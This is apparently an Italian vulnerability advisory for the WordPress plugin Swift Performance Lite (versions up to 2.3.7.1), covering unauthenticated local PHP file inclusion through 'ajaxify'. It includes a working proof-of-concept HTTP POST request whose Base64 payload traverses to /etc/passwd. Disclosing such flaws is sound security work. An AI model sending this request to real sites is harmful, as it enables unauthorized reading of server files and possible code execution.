
Swift Performance Lite <= 2.3.7.1 - Inclusione locale di file PHP non autenticata tramite 'ajaxify'
Swift Performance Lite <= 2.3.7.1 - Inclusione locale di file PHP non autenticata tramite 'ajaxify'
Il plugin Swift Performance Lite per WordPress è vulnerabile all'inclusione locale di file PHP in tutte le versioni fino alla 2.3.7.1 inclusa, tramite la funzione 'ajaxify'. Ciò consente ad attaccanti non autenticati di includere ed eseguire file arbitrari sul server, permettendo l'esecuzione di qualsiasi codice PHP contenuto in tali file. Questa vulnerabilità può essere utilizzata per bypassare i controlli di accesso, ottenere dati sensibili o ottenere l'esecuzione di codice nei casi in cui immagini e altri tipi di file "sicuri" possono essere caricati e inclusi.
Payload Base64 = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==